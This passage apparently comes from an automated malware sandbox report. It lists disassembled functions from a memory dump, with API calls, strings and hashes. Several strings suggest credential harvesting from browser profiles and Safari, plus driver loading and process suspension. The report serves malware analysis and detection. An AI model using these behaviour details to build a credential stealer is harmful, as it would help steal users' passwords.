                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                                                                  • API String ID: 577499730-1134094380
                                                                                                                                                                                                                                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 829165378-0
                                                                                                                                                                                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                                                                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                                                                                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                                                                                                                                                                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
